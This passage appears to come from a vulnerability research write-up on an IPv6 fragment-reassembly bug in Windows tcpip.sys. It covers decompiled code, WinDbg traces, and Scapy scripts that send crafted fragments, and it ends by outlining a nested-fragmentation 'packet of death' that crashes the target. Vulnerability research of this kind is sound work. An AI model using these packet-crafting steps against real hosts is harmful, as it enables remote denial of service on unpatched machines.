      Demuxer = &Protocol->Demuxers[IpProto];
    }
    // Only extension headers get parsed by this loop.
    if ( !Demuxer->IsExtensionHeader )
      Demuxer = 0;
    if ( Demuxer )
      Demuxer->Parse(RcvList);
    else
      RcvList = RcvList->Next;
  }


Makes sense - that's kinda how we would implement parsing of IPv6 packets as well right?

It is easy to dump the demuxers and their associated NextHeader / Parse values; these might come handy later.

- nh = 0  -> Ipv6pReceiveHopByHopOptions
- nh = 44 -> Ipv6pReceiveFragmentList
- nh = 60 -> Ipv6pReceiveDestinationOptions
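
The demuxer idea can be mimicked with a dictionary that maps a next-header value to a parsing routine. The sketch below is my own simplification and not how tcpip.sys is written: the parsers only return the following next-header value and the header length, there is no bounds checking, and `DEMUXERS`, `parse_options`, `parse_fragment` and `walk_headers` are hypothetical names.

```python
# Sketch of a demuxer table: next-header value -> parser. Each parser
# returns (next_header, header_length). Names are illustrative only.
def parse_options(buf):
    # Hop-by-Hop and Destination Options share a layout: next header,
    # then a length expressed in 8-byte units, not counting the first 8.
    return buf[0], (buf[1] + 1) * 8

def parse_fragment(buf):
    # The fragment header is always 8 bytes long.
    return buf[0], 8

DEMUXERS = {0: parse_options, 44: parse_fragment, 60: parse_options}

def walk_headers(next_header, payload):
    '''Consume extension headers until the first non-extension header.'''
    offset, seen = 0, []
    while next_header in DEMUXERS:
        seen.append(next_header)
        next_header, length = DEMUXERS[next_header](payload[offset:])
        offset += length
    return seen, next_header, offset

# Hop-by-Hop (8 bytes) -> Destination Options (8 bytes) -> UDP (17).
payload = bytes([60, 0]) + bytes(6) + bytes([17, 0]) + bytes(6) + b'udp...'
print(walk_headers(0, payload))
```

The loop stops as soon as the next header has no entry in the table, which is the moment the driver moves on to the next packet.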


A demuxer can expose a callback routine for parsing, which I called Parse. The Parse method receives a Packet and is free to update its state; for example to grab the NextHeader that is needed to know how to parse the next layer. This is what Ipv6pReceiveFragmentList looks like (Ipv6FragmentDemux.Parse):

It makes sure the next header is IPPROTO_FRAGMENT before going further. Again, makes sense.

The mechanics of IPv6 fragmentation

Now that we understand the overall flow a bit more, it is a good time to start thinking about fragmentation. We know we need to send fragmented packets to hit the code that was fixed by the update, which we know is important somehow. The function that parses fragments is Ipv6pReceiveFragment and it is hairy. Again, keeping track of fragments probably warrants that, so nothing unexpected here.

It's also the right time for us to read literature about how exactly IPv6 fragmentation works. Concepts have been useful until now, but at this point we need to understand the nitty-gritty details. I don't want to spend too much time on this as there is tons of content online discussing the subject so I'll just give you the fast version. To define a fragment, you need to add a fragmentation header which is called IPv6ExtHdrFragment in Scapy land:

class IPv6ExtHdrFragment(_IPv6ExtHdr):
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   BitField("res1", 0, 8),
                   BitField("offset", 0, 13),
                   BitField("res2", 0, 2),
                   BitField("m", 0, 1),
                   IntField("id", None)]


The most important fields for us are:

• offset, which tells where the data that follows this header should be placed in the reassembled packet,
• the m bit, which specifies whether or not this is the last fragment.

Note that the offset field is expressed in blocks of 8 bytes; if you set it to 1, it means that your data will be at +8 bytes. If you set it to 2, it will be at +16 bytes, etc.
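
If you want to see the bits without Scapy, the header is easy to pack by hand. The following sketch only relies on the field sizes listed above (8 bits of next header, 8 reserved bits, 13 bits of offset, 2 reserved bits, 1 bit for m and a 32-bit identifier); `pack_frag_header` and `unpack_frag_header` are helper names I made up.

```python
import struct

def pack_frag_header(nh, offset, m, frag_id):
    '''Build the 8-byte fragment header: nh, reserved, offset/res/M, id.'''
    assert 0 <= offset < (1 << 13)
    return struct.pack('!BBHI', nh, 0, (offset << 3) | (m & 1), frag_id)

def unpack_frag_header(raw):
    nh, _, off_m, frag_id = struct.unpack('!BBHI', raw[:8])
    offset = off_m >> 3
    # The offset counts 8-byte blocks, so the byte position is offset * 8.
    return {'nh': nh, 'offset': offset, 'byte_offset': offset * 8,
            'm': off_m & 1, 'id': frag_id}

raw = pack_frag_header(nh=17, offset=2, m=1, frag_id=0xdeadbeef)
fields = unpack_frag_header(raw)
print(raw.hex(), fields['byte_offset'])
```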

Here is a small ghetto IPv6 fragmentation function I wrote to ensure I was understanding things properly. I enjoy learning through practice. (Scapy has fragment6):

def frag6(target, frag_id, bytes, nh, frag_size = 1008):
    '''Ghetto fragmentation.'''
    assert (frag_size % 8) == 0
    leftover = bytes
    offset = 0
    frags = []
    while len(leftover) > 0:
        chunk = leftover[: frag_size]
        leftover = leftover[len(chunk): ]
        last_pkt = len(leftover) == 0
        # 0 -> No more / 1 -> More
        m = 0 if last_pkt else 1
        assert offset < 8191
        pkt = Ether() \
            / IPv6(dst = target) \
            / IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \
            / chunk

        offset += (len(chunk) // 8)
        frags.append(pkt)
    return frags


Easy enough. The other important aspect of fragmentation in the literature is related to IPv6 headers and what is called the unfragmentable part of a packet. Here is how Microsoft describes the unfragmentable part: "This part consists of the IPv6 header, the Hop-by-Hop Options header, the Destination Options header for intermediate destinations, and the Routing header". It also is the part that precedes the fragmentation header. Obviously, if there is an unfragmentable part, there is a fragmentable part. Easy, the fragmentable part is what you are sending behind the fragmentation header. The reassembly process is the process of stitching together the unfragmentable part with the reassembled fragmentable part into one beautiful reassembled packet. Here is a diagram taken from Understanding the IPv6 Header that sums it up pretty well:

All of this theoretical information is very useful because we can now look for those details while we reverse-engineer. It is always easier to read code and try to match it against what it is supposed or expected to do.
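
As a mental model, the stitching described by the literature boils down to something like the Python below. It is a simplification written for this explanation: `reassemble` is a hypothetical helper, fragments are plain tuples, overlaps are rejected outright, and the header fixups a real stack has to do on the reassembled packet are left out.

```python
def reassemble(unfragmentable, fragments):
    '''Stitch fragments together. `fragments` is a list of
    (offset_in_8_byte_blocks, more_flag, data) tuples in any order.
    Returns the reassembled bytes, or None if a piece is missing.'''
    fragmentable = bytearray()
    complete = False
    for offset, more, data in sorted(fragments, key=lambda f: f[0]):
        if offset * 8 != len(fragmentable):
            return None             # hole (or overlap): give up
        fragmentable += data
        if not more:
            complete = True
            break
    if not complete:
        return None                 # the last fragment never arrived
    # Unfragmentable part first, then the reassembled fragmentable part.
    return bytes(unfragmentable) + bytes(fragmentable)

frags = [(2, 0, b'tail'), (0, 1, b'A' * 8), (1, 1, b'B' * 8)]
print(reassemble(b'<ipv6+opts>', frags))
```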

At this point, I felt I had accumulated enough new information and it was time to zoom back in on the target. We want to verify that reality works like the literature says it does, and by doing so we will improve our overall understanding. After studying this code for a while we start to understand the big lines. The function receives a Packet but as this structure is packet specific it is not enough to track the state required to reassemble a packet. This is why another important structure is used for that; I called it Reassembly.

The overall flow is basically broken up into three main parts; again, no need for us to understand every single detail, let's just understand it conceptually and what/how it tries to achieve its goals:

• 1 - Figure out if the received fragment is part of an already existing Reassembly. According to the literature, we know that network stacks should use the source address, the destination address as well as the fragmentation header's identifier to determine if the current packet is part of a group of fragments. In practice, the function IppReassemblyHashKey hashes those fields together and the resulting hash is used to index into a hash-table that stores Reassembly structures (Ipv6pFragmentLookup):
int IppReassemblyHashKey(__int64 Iface, int Identification, __int64 Pkt)
{
  //...
  Protocol = *(_QWORD *)(Iface + 40);
  OffsetSrcIp = 12i64;
  AddressLength = *(unsigned __int16 *)(*(_QWORD *)(Protocol + 16) + 6i64);
  if ( Protocol != Ipv4Global )
    OffsetSrcIp = offsetof(ipv6_header_t, src);
  H = RtlCompute37Hash(
    g_37HashSeed,
    Pkt + OffsetSrcIp,
    AddressLength
  );
  OffsetDstIp = 16i64;
  if ( Protocol != Ipv4Global )
    OffsetDstIp = offsetof(ipv6_header_t, dst);
  H2 = RtlCompute37Hash(H, Pkt + OffsetDstIp, AddressLength);
  return RtlCompute37Hash(H2, &Identification, 4i64) | 0x80000000;
}

Reassembly_t* Ipv6pFragmentLookup(__int64 Iface, int Identification, ipv6_header_t *Pkt, KIRQL *OldIrql)
{
  // ...
  v5 = *(_QWORD *)Iface;
  Context.Signature = 0;
  HashKey = IppReassemblyHashKey(v5, Identification, (__int64)Pkt);
  *OldIrql = KeAcquireSpinLockRaiseToDpc(&Ipp6ReassemblyHashTableLock);
  for ( CurrentReassembly = (Reassembly_t *)RtlLookupEntryHashTable(&Ipp6ReassemblyHashTable, HashKey, &Context);
        ;
        CurrentReassembly = (Reassembly_t *)RtlGetNextEntryHashTable(&Ipp6ReassemblyHashTable, &Context) )
  {
    // If we have walked through all the entries in the hash-table,
    // then we can just bail.
    if ( !CurrentReassembly )
      return 0;
    // If the current entry matches our iface, pkt id, ip src/dst
    // then we found a match!
    if ( CurrentReassembly->Iface == Iface
      && CurrentReassembly->Identification == Identification
      && memcmp(&CurrentReassembly->Ipv6.src.u.Byte[0], &Pkt->src.u.Byte[0], 16) == 0
      && memcmp(&CurrentReassembly->Ipv6.dst.u.Byte[0], &Pkt->dst.u.Byte[0], 16) == 0 )
    {
      break;
    }
  }
  // ...
  return CurrentReassembly;
}

• 1.1 - If the fragment doesn't belong to any known group, it needs to be put in a newly created Reassembly. This is what IppCreateInReassemblySet does. It's worth noting that this is a point of interest for a reverse-engineer because this is where the Reassembly object gets allocated and constructed (in IppCreateReassembly). It means we can retrieve its size as well as some more information about some of the fields.
Reassembly_t *IppCreateInReassemblySet(
  PKSPIN_LOCK SpinLock, void *Src, __int64 Iface, __int64 Identification, KIRQL NewIrql
)
{
  Reassembly_t *Reassembly = IppCreateReassembly(Src, Iface, Identification);
  if ( Reassembly )
  {
    IppInsertReassembly((__int64)SpinLock, Reassembly);
    KeAcquireSpinLockAtDpcLevel(&Reassembly->Lock);
    KeReleaseSpinLockFromDpcLevel(SpinLock);
  }
  else
  {
    KeReleaseSpinLock(SpinLock, NewIrql);
  }
  return Reassembly;
}


• 2 - Now that we have a Reassembly structure, the main function wants to figure out where the current fragment fits in the overall reassembled packet. The Reassembly keeps track of fragments using various lists. It uses a ContiguousList that chains fragments that will be contiguous in the reassembled packet. IppReassemblyFindLocation is the function that seems to implement the logic to figure out where the current fragment fits.

• 2.1 - If IppReassemblyFindLocation returns a pointer to the start of the ContiguousList, it means that the current packet is the first fragment. This is where the function extracts and keeps track of the unfragmentable part of the packet. It is kept in a pool buffer that is referenced in the Reassembly structure.

if ( ReassemblyLocation == &Reassembly->ContiguousStartList )
{
  Reassembly->UnfragmentableLength = UnfragmentableLength;
  if ( UnfragmentableLength )
  {
    UnfragmentableData = ExAllocatePoolWithTagPriority(
      (POOL_TYPE)512,
      UnfragmentableLength,
      'erPI',
      LowPoolPriority
    );
    Reassembly->UnfragmentableData = UnfragmentableData;
    if ( !UnfragmentableData )
    {
      // ...
      goto Bail_0;
    }
    // ...
    // Copy the unfragmentable part of the packet inside the pool
    // buffer that we have allocated.
    RtlCopyMdlToBuffer(
      FirstNetBuffer->MdlChain,
      Reassembly->UnfragmentableData,
      Reassembly->UnfragmentableLength,
      v51);
  }
  *(_QWORD *)&Reassembly->Ipv6 = *(_QWORD *)Packet->Ipv6Hdr;
}

• 3 - The fragment is then added into the Reassembly as part of a group of fragments by IppReassemblyInsertFragment. On top of that, if we have received every fragment necessary to start a reassembly, the function Ipv6pReassembleDatagram is invoked. Remember this guy? This is the function that has been patched and that we hit earlier in the post. But this time, we understand how we got there.
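
The three steps above can be condensed into a toy Python model. Everything in it is an assumption made for illustration: the class and method names are mine, a Python dictionary stands in for the hash-table and its hashing routine, and completeness is checked with a plain walk over the offsets instead of the lists the driver maintains.

```python
# Toy model of steps 1 to 3; class and method names are hypothetical.
class Reassembly:
    def __init__(self):
        self.fragments = {}     # byte offset -> data
        self.total = None       # known once the last fragment shows up

    def insert(self, offset_blocks, more, data):
        self.fragments[offset_blocks * 8] = data
        if not more:
            self.total = offset_blocks * 8 + len(data)

    def is_complete(self):
        if self.total is None:
            return False
        expected = 0
        for start in sorted(self.fragments):
            if start != expected:
                return False    # hole in the data
            expected += len(self.fragments[start])
        return expected == self.total


class ReassemblySet:
    def __init__(self):
        self.table = {}

    def receive(self, iface, src, dst, frag_id, offset_blocks, more, data):
        # Step 1 / 1.1: find the group this fragment belongs to, or create it.
        key = (iface, src, dst, frag_id)
        reassembly = self.table.setdefault(key, Reassembly())
        # Step 2 / 3: place the fragment, reassemble once nothing is missing.
        reassembly.insert(offset_blocks, more, data)
        if not reassembly.is_complete():
            return None
        del self.table[key]
        frags = reassembly.fragments
        return b''.join(frags[o] for o in sorted(frags))


rs = ReassemblySet()
first = rs.receive(1, 'fe80::1', 'ff02::1', 0x1337, 1, 0, b'world')
second = rs.receive(1, 'fe80::1', 'ff02::1', 0x1337, 0, 1, b'hello,  ')
print(first, second)
```

The fragments are deliberately sent out of order here: the last one arrives first, nothing happens, and the reassembly only fires once the hole at offset 0 is filled.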

At this stage we have an OK understanding of the data structures involved to keep track of groups of fragments and how/when reassembly gets kicked off. We've also commented and refined various structure fields that we lifted early in the process; this is very helpful because now we can understand the fix for the vulnerability:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  //...
  UnfragmentableLength = Reassembly->UnfragmentableLength;
  TotalLength = UnfragmentableLength + Reassembly->DataLength;
  // Below is the added code by the patch
  if ( TotalLength > 0xFFFF ) {
    // Bail
  }


How cool is that? That's really rewarding. Putting in a bunch of work that may feel not that useful at the time, but eventually adds up, snow-balls and really moves the needle forward. It's just a slow process and you gotta get used to it; that's just how the sausage is made.

Let's not get ahead of ourselves though, the emotional rollercoaster is right around the corner :)

Hiding in plain sight

All right - at this point I think we are done with zooming out and understanding the big picture. We understand the beast well enough to start getting back on this BSoD. After reading Ipv6pReassembleDatagram a few times I honestly couldn't figure out where the advertised crash could happen. Pretty frustrating. That is why I decided instead to use the debugger to modify Reassembly->DataLength and UnfragmentableLength at runtime to see if this could give me any hints. The first one didn't seem to do anything, but the second one bug-checked the machine with a NULL dereference, bingo that is looking good!

After carefully analyzing the crash I've started to realize that the potential issue has been hiding in plain sight in front of my eyes; here is the code:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // ...
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0i64,
                                        0i64,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0i64, 1u, 0);

  //...
  *Buffer = Reassembly->Ipv6;


NetioAllocateAndReferenceNetBufferAndNetBufferList allocates a brand new NBL called NetBufferList. Then NetioRetreatNetBuffer is called:

NDIS_STATUS NetioRetreatNetBuffer(_NET_BUFFER *Nb, ULONG Amount, ULONG DataBackFill)
{
  const uint32_t CurrentMdlOffset = Nb->CurrentMdlOffset;
  if ( CurrentMdlOffset < Amount )
    return NdisRetreatNetBufferDataStart(Nb, Amount, DataBackFill, NetioAllocateMdl);
  Nb->DataOffset -= Amount;
  Nb->DataLength += Amount;
  Nb->CurrentMdlOffset = CurrentMdlOffset - Amount;
  return 0;
}


Because the FirstNetBuffer just got allocated, it is empty and most of its fields are zero. This means that NetioRetreatNetBuffer triggers a call to NdisRetreatNetBufferDataStart which is publicly documented. According to the documentation, it should allocate an MDL using NetioAllocateMdl as the network buffer is empty as we mentioned above. One thing to notice is that the amount of bytes, HeaderAndOptionsLength, passed to NetioRetreatNetBuffer is truncated to a uint16_t; odd.

  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )


Now that there is backing space in the NB for the IPv6 header as well as the unfragmentable part of the packet, the function needs to get a pointer to the backing data in order to populate the buffer. NdisGetDataBuffer is documented as a way to gain access to a contiguous block of data from a NET_BUFFER structure. Even after reading the documentation several times, it was still a little bit confusing to me, so I figured I'd throw NDIS in IDA and have a look at the implementation:

PVOID NdisGetDataBuffer(PNET_BUFFER NetBuffer, ULONG BytesNeeded, PVOID Storage, UINT AlignMultiple, UINT AlignOffset)
{
const _MDL *CurrentMdl = NetBuffer->CurrentMdl;
if ( !BytesNeeded || !CurrentMdl || NetBuffer->DataLength < BytesNeeded )
return 0i64;
// ...


Just looking at the beginning of the implementation something stands out. As NdisGetDataBuffer is called with HeaderAndOptionsLength (not truncated), we should be able to hit the following condition NetBuffer->DataLength < BytesNeeded when HeaderAndOptionsLength is larger than 0xffff. Why, you ask? Let's take an example. HeaderAndOptionsLength is 0x1337, so NetioRetreatNetBuffer allocates a backing buffer of 0x1337 bytes, and NdisGetDataBuffer returns a pointer to the newly allocated data; works as expected. Now let's imagine that HeaderAndOptionsLength is 0x31337. This means that NetioRetreatNetBuffer allocates 0x1337 (because of the truncation) bytes but calls NdisGetDataBuffer with 0x31337 which makes the call fail because the network buffer is not big enough and we hit this condition NetBuffer->DataLength < BytesNeeded.
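To make the mismatch concrete, here is a minimal Python model of the two calls. It is only a sketch: the class and function names are made up for illustration, and the model keeps nothing but the one field and the one check quoted above (the real routines do much more).

```python
from typing import Optional

UINT16_MASK = 0xFFFF


class NetBuffer:
    """Toy stand-in for NET_BUFFER: only tracks how many bytes are backed."""

    def __init__(self) -> None:
        self.data_length = 0


def retreat(nb: NetBuffer, amount: int) -> None:
    # Mirrors the uint16_t(HeaderAndOptionsLength) cast at the call site:
    # only the low 16 bits of the requested size get backed by memory.
    nb.data_length += amount & UINT16_MASK


def get_data_buffer(nb: NetBuffer, bytes_needed: int) -> Optional[bytearray]:
    # Mirrors the early-out at the top of NdisGetDataBuffer.
    if bytes_needed == 0 or nb.data_length < bytes_needed:
        return None
    return bytearray(bytes_needed)


def reassemble_header(header_and_options_length: int) -> Optional[bytearray]:
    # Retreat with the truncated size, then ask for the full size.
    nb = NetBuffer()
    retreat(nb, header_and_options_length)
    return get_data_buffer(nb, header_and_options_length)


print(reassemble_header(0x1337) is not None)  # small header: a buffer comes back
print(reassemble_header(0x31337) is None)     # large header: NULL comes back
```

Any size above 0xffff behaves like the second call, since the retreat can never back more than 0xffff bytes.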

As the returned pointer is trusted not to be NULL, Ipv6pReassembleDatagram carries on by using it for a memory write:

  *Buffer = Reassembly->Ipv6;


This is where it should bugcheck. As usual we can verify our understanding of the function with a WinDbg session. Here is a simple Python script that sends two fragments:

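from scapy.all import *
# Both fragments must share the same identification value.
frag_id = 0xc0ffee
first = Ether() \
/ IPv6(dst = 'ff02::1') \
/ IPv6ExtHdrFragment(id = frag_id, m = 1, offset = 0) \
/ UDP(sport = 0x1122, dport = 0x3344) \
/ '---frag1'
# offset is expressed in 8-byte units: UDP header (8) + '---frag1' (8) = 2 units
second = Ether() \
/ IPv6(dst = 'ff02::1') \
/ IPv6ExtHdrFragment(id = frag_id, m = 0, offset = 2) \
/ '---frag2'
sendp([first, second], iface='eth1')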


Let's see what the reassembly looks like when those packets are received:

kd> bp tcpip!Ipv6pReassembleDatagram

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff800117cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> p
tcpip!Ipv6pReassembleDatagram+0x5:
fffff800117cdd71 48894c2408      mov     qword ptr [rsp+8],rcx

// ...

kd>
tcpip!Ipv6pReassembleDatagram+0x9c:
fffff800117cde08 48ff1569660700  call    qword ptr [tcpip!_imp_NetioAllocateAndReferenceNetBufferAndNetBufferList (fffff80011844478)]

kd>
tcpip!Ipv6pReassembleDatagram+0xa3:
fffff800117cde0f 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=ffffc107f7be1d90 <- this is the allocated NBL

kd> !ndiskd.nbl @rax
NBL                ffffc107f7be1d90    Next NBL           NULL
First NB           ffffc107f7be1f10    Source             NULL
Pool               ffffc107f58ba980 - NETIO
Flags              NBL_ALLOCATED

Walk the NBL chain                     Dump data payload
Show out-of-band information           Display as Wireshark hex dump

; The first NB is empty; its length is 0 as expected

kd> !ndiskd.nb ffffc107f7be1f10
NB                 ffffc107f7be1f10    Next NB            NULL
Length             0                   Source pool        ffffc107f58ba980
First MDL          0                   DataOffset         0
Current MDL        [NULL]              Current MDL offset 0

View associated NBL

// ...

kd> r @rcx, @rdx
rcx=ffffc107f7be1f10 rdx=0000000000000028 <- the first NB and the size to allocate for it

kd>
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff800117cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff80011691354)

kd> p
tcpip!Ipv6pReassembleDatagram+0xde:
fffff800117cde4a 85c0            test    eax,eax

; The first NB now has 0x28 bytes backing MDL

kd> !ndiskd.nb ffffc107f7be1f10
NB                 ffffc107f7be1f10    Next NB            NULL
Length             0n40                Source pool        ffffc107f58ba980
First MDL          ffffc107f5ee8040    DataOffset         0n56
Current MDL        [First MDL]         Current MDL offset 0n56

View associated NBL

// ...

kd>
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff800117cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff80011844178)]

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff800117cde71 0f1f440000      nop     dword ptr [rax+rax]

; This is the backing buffer; it has leftover data, but gets initialized later

kd> db @rax
ffffc107f5ee80b0  05 02 00 00 01 00 8f 00-41 dc 00 00 00 01 04 00  ........A.......


All right, so it sounds like we have a plan - let's get to work.

Manufacturing a packet of the death: chasing phantoms

Well... sending a packet with a large header should be trivial, right? That's initially what I thought. After trying various things to achieve this goal, I quickly realized it wouldn't be that easy. The main issue is the MTU. Basically, network devices don't let you send packets bigger than the MTU, which is usually around 1500 bytes on Ethernet. Online content suggests that some Ethernet cards and network switches allow you to bump this limit. Because I was running my test in my own Hyper-V lab, I figured it was fair enough to try to reproduce the NULL dereference with non-default parameters, so I looked for a way to increase the MTU on the virtual switch to 64k.

The issue with that is that Hyper-V didn't allow me to do that. The only parameter I found allowed me to bump the limit to about 9k which is very far from the 64k I needed to trigger this issue. At this point, I felt frustrated because I felt I was so close to the end, but no cigar. Even though I had read that this vulnerability could be thrown over the internet, I kept going in this wrong direction. If it could be thrown from the internet, it meant it had to go through regular network equipment and there was no way a 64k packet would work. But I ignored this hard truth for a bit of time.

Eventually, I accepted the fact that I was probably heading in the wrong direction, ugh. So I reevaluated my options. I figured that the bugcheck I triggered above was not the one that I would be able to trigger with packets thrown from the Internet. Maybe there was another code path with a very similar pattern (retreat + NdisGetDataBuffer) that would result in a bugcheck. I noticed that the TotalLength field is also truncated a bit further down in the function and written into the IPv6 header of the packet. This header is eventually copied into the final reassembled IPv6 header:

// The ROR2 is basically htons.
// One weird thing here is that TotalLength is truncated to 16b.
// We are able to make TotalLength >= 0x10000 by crafting a large
// packet via fragmentation.
// The issue with that is that, the size from the IPv6 header is smaller than
// the real total size. It's kinda hard to see how this would cause subsequent
// issue but hmm, yeah.
Reassembly->Ipv6.length = __ROR2__(TotalLength, 8);
// B00m, Buffer can be NULL here because of the issue discussed above.
// This copies the saved IPv6 header from the first fragment into the
// first part of the reassembled packet.
*Buffer = Reassembly->Ipv6;


My theory was that there might be some code that would read this Ipv6.length (which is truncated as __ROR2__ expects a uint16_t) and something bad might happen as a result. Although, the length would end up having a smaller value than the actual real size of the packet; it was hard for me to come up with a scenario where this would cause an issue but I still chased this theory as this was the only thing I had.
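As a quick sanity check of the "ROR2 is basically htons" remark, here is a small Python sketch. The helper names are mine, and it assumes a little-endian machine, which is the case for the x64 target here.

```python
import struct


def ror16(value: int, count: int) -> int:
    """Rotate a 16-bit value right by count bits, like __ROR2__."""
    value &= 0xFFFF  # the operand is a uint16_t, so higher bits are dropped
    count %= 16
    return ((value >> count) | (value << (16 - count))) & 0xFFFF


def stored_length(total_length: int) -> bytes:
    """Bytes that land in memory when the rotated value is stored little-endian."""
    return struct.pack('<H', ror16(total_length, 8))


# Rotating by 8 swaps the two bytes, which gives network byte order in memory.
print(stored_length(0x1234) == struct.pack('!H', 0x1234))
# Bits above the low 16 are lost before the swap.
print(stored_length(0x10020).hex())
```

With a TotalLength of 0x10020, only 0x0020 survives, so the length written in the header is much smaller than the real size of the packet.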

What I started to do at this point was to audit every demuxer that we saw earlier. I looked for ones that would use this length field somehow and looked for similar retreat / NdisGetDataBuffer patterns. Nothing. Thinking I might be missing something statically, I also heavily used WinDbg to verify my work. I used hardware breakpoints to track accesses to those two bytes but got no hit. Ever. Frustrating.

After trying and trying I started to think that I might have been headed in the wrong direction again. Maybe I really needed to find a way to send such a large packet without violating the MTU. But how?

Manufacturing a packet of the death: leap of faith

All right, so I decided to start fresh again. Going back to the big picture, I studied the reassembly algorithm a bit more and diffed again just in case I had missed a clue somewhere, but nothing...

Could I fragment a packet that has a very large header and trick the stack into reassembling the reassembled packet? We've seen previously that we could use reassembly as a primitive to stitch fragments together; so instead of trying to send a very large fragment, maybe we could break down a large one into smaller ones and have them stitched together in memory. It honestly felt like a long leap forward, but based on my reverse-engineering effort I didn't really see anything that would prevent that. The idea was blurry but felt like it was worth a shot. How would it really work though?

Sitting down for a minute, this is the theory that I came up with. I created a very large fragment that has many headers; enough to trigger the bug assuming I could trigger another reassembly. Then, I fragmented this fragment so that it can be sent to the target without violating the MTU.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
]) \
# ....
/ IPv6ExtHdrDestOpt(options = [
]) \
/ IPv6ExtHdrFragment(
id = second_pkt_id, m = 1,
nh = 17, offset = 0
) \
/ UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

reassembled_pkt = bytes(reassembled_pkt)
frags = frag6(args.target, frag_id, reassembled_pkt, 60)
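The frag6 helper used above is not shown here. To illustrate the bookkeeping any such splitter has to do, below is a hypothetical, pure-Python planner (not the author's code): it only computes the fragment offset (in 8-byte units, as in the Fragment header), the M flag and the length of each piece.

```python
from typing import List, Tuple


def plan_fragments(payload_len: int, chunk_size: int) -> List[Tuple[int, int, int]]:
    """Return (offset_in_8_byte_units, m_flag, length) for each fragment."""
    # Every fragment but the last must carry a multiple of 8 bytes,
    # because the offset field counts 8-byte units.
    if chunk_size <= 0 or chunk_size % 8:
        raise ValueError('chunk_size must be a positive multiple of 8')
    plan = []
    for start in range(0, payload_len, chunk_size):
        length = min(chunk_size, payload_len - start)
        # M (more fragments) is set on every fragment except the last one.
        more = 1 if start + length < payload_len else 0
        plan.append((start // 8, more, length))
    return plan


for entry in plan_fragments(20, 8):
    print(entry)
```

Each tuple maps directly onto the offset and m arguments of IPv6ExtHdrFragment; the chunk size is whatever fits under the MTU once the headers are accounted for.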


The reassembly happens and tcpip.sys builds this huge reassembled fragment in memory; that's great as I didn't think it would work. Here is what it looks like in WinDbg:

kd> bp tcpip+01ADF71 ".echo Reassembled NB; r @r14;"

kd> g
Reassembled NB
r14=ffff800fa2a46f10
tcpip!Ipv6pReassembleDatagram+0x205:
fffff8010a7cdf71 41394618        cmp     dword ptr [r14+18h],eax

kd> !ndiskd.nb @r14
NB                 ffff800fa2a46f10    Next NB            NULL
Length                10020            Source pool        ffff800fa06ba240
First MDL          ffff800fa0eb1180    DataOffset         0n56
Current MDL        [First MDL]         Current MDL offset 0n56

View associated NBL

kd> !ndiskd.nbl ffff800fa2a46d90
NBL                ffff800fa2a46d90    Next NBL           NULL
First NB           ffff800fa2a46f10    Source             NULL
Pool               ffff800fa06ba240 - NETIO
Flags              NBL_ALLOCATED

Walk the NBL chain                     Dump data payload
Show out-of-band information           Display as Wireshark hex dump

kd> !ndiskd.nbl ffff800fa2a46d90 -data
NET_BUFFER ffff800fa2a46f10
MDL ffff800fa0eb1180
ffff800fa0eb11f0  60 00 00 00 ff f8 3c 40-fe 80 00 00 00 00 00 00  ·····<@········
ffff800fa0eb1200  02 15 5d ff fe e4 30 0e-ff 02 00 00 00 00 00 00  ··]···0·········
ffff800fa0eb1210  00 00 00 00 00 00 00 01                          ········

...

MDL ffff800f9ff5e8b0
ffff800f9ff5e8f0  3c e1 01 ff 61 61 61 61-61 61 61 61 61 61 61 61  <···aaaaaaaaaaaa
ffff800f9ff5e900  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e910  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e920  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e930  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e940  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e950  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e960  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa

...

MDL ffff800fa0937280
ffff800fa09372c0  7a 69 7a 69 00 08 7e 7f                          zizi··~·


What we see above is the reassembled first fragment.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
]) \
# ...
/ IPv6ExtHdrDestOpt(options = [
]) \
/ IPv6ExtHdrFragment(
id = second_pkt_id, m = 1,
nh = 17, offset = 0
) \
/ UDP(dport = 31337, sport = 31337, chksum=0x7e7f)


